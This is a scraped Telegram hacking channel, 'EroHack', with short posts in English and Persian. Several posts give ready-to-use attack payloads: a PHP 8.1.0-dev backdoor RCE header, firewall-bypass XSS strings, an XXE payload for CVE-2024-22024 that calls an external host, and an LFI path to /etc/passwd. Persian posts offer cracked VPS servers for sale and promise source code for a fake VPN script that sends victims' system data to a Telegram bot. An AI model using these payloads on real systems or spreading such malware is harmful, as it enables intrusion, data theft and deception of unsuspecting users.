Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
IMG_20240731_133438_075.png
606.6 KB
☠️Web pentester rodmap☠️

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71👍1
🖥 Repository: Nikto — Web Application Scanning Tool

ابزار nikto برای اسکن وب سرورها و یافتن آسیب پذیری در برنامه های تحت وب است. این ابزار توانایی تجزیه و تحلیل سرورهای وب برای آسیب پذیری های شناخته شده، دایرکتوری های مخفی، فایل ها و سایر آبجکت های  خطرناک را فراهم می کند.
— این ابزار به طور فعال توسط جامعه امنیت اطلاعات توسعه یافته و برای اطمینان از کارایی بالا در تشخیص آسیب پذیری ها به روز شده است. ابزار nikto به دلیل انعطاف پذیری و طیف گسترده ای از ویژگی ها، یکی از محبوب ترین ابزارها برای ممیزی امنیت برنامه های وب است.

🔹https://github.com/sullo/nikto

#Vulnerability #Fuzzing
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥61👍1💯1
😈Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥2
Find a server running PHP 8.1.0-dev 
💀 Check for easy RCE  💀

🖥 Payload
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7😐1🗿1
🟫 WAF Fortinet FortiGate XSS Bypass

🖥Payload
<details open ontoggle="(()=>alertibrahimxss)()"></details>

#XSS #WAF #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍3🔥1
⭐️𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵

𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟:
"target/lib/css/animated.min.css"


𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"


#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
💀CVE-2024-22024💀

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>


📺 send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm


#bugbountytips #cve #Ivanti
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5💯3🗿1
💉 LFI Payload 💉

💀Payload💀
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty  #CyberSecurity
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥1💯1
⭕️⭕️ ‌ ‌ درود دوستان ‌
ایشالله از فردا فعالیت چنل مثل سابق میشه.
کلی آموزش جدید و ابزار تو راه، پس پای کار باشید💀
⭕️ ‌‌ برای حمایت از چنل حتما برای پست‌ها ری‌اکشن بزارید و برای دوستانتون بفرستید.
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥3💯2
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️⭕️ ‌ ‌ درود دوستان ‌ ایشالله از فردا فعالیت چنل مثل سابق میشه. کلی آموزش جدید و ابزار تو راه، پس پای کار باشید💀 ⭕️ ‌‌ برای حمایت از چنل حتما برای پست‌ها ری‌اکشن بزارید و برای دوستانتون بفرستید.»
⭕️‌  ‌چند روز پیش اقای یاشار به بات های ناشناس نفوذ کرده و یک سری اطلاعات بیرون کشیده...
🖥View Tweet
🔹🔺🔹🔺🔹🔺🔹🔺🔹🔺🔹
⭕️ ‌ ‌پاول دوروف، بنیان‌گذار و مدیر عامل تلگرام در حومه پاریس بازداشت شد.
⭕️ ‌ ‌ اکنون با دستگیری پاول دوروف شاهد کاهش چشمگیر ارزش رمزارز TON خواهیم بود.
⭕️ ‌‌ ‌ مدیرعامل و موسس تلگرام اعلام کردند که طبق پروتکل امنیتی که خود پاول دوروف طراحی کرده است در صورت دستگیری وی اطلاعات مهم کاربران از سیستم حذف خواهد شد تا تحت هر شرایطی دست دولت نیفتند.
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
😐4👍3🤣3🗿2
🤌براتون (VPS) کرکی موجود کنیم؟!😎
Final Results
88%
👍
12%
👎
👍3🔥2💯2🗿1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «🤌براتون (VPS) کرکی موجود کنیم؟!😎»
🤯اسکریپت ساده پایتونی در قالب فیلترشکن تونستیم اطلاعات سیستم رو به بات تلگرام ارسال کنیم👻
ری‌اکشن زیر همین پست بالا باشه آموزش و سورس رو در اختیارتون میزارم.
If the reaction is high under this post, I will provide you with the training and source.


🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23🔥96💯4
LazyDork Tool is Google dorker tool help during google dorking link

🔗 Site

#Google #Dork #Maker
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍1🔥1👾1
Eʀᴏ ··ʜᴀᴄᴋ··
🤌براتون (VPS) کرکی موجود کنیم؟!😎
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
طبق نظر سنجی‌ که گذاشتیم میتونید برای تهیه سرور (VPS) کرکی به آیدی زیر پیام بدید.

🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🔗@GoRunEro
2🔥2🗿1
🙂One XSS Payload for bypass ( Akamai, imperva, cloudflare & Waf ) 🚪

HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#Xss #Payload #Waf

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥62🤯1
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🔥2🫡1🗿1
‼️DorkGPT - Generate Google Dorks with AI

🔗DorkGPT

#Dork #ai
🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍2💯1🎃1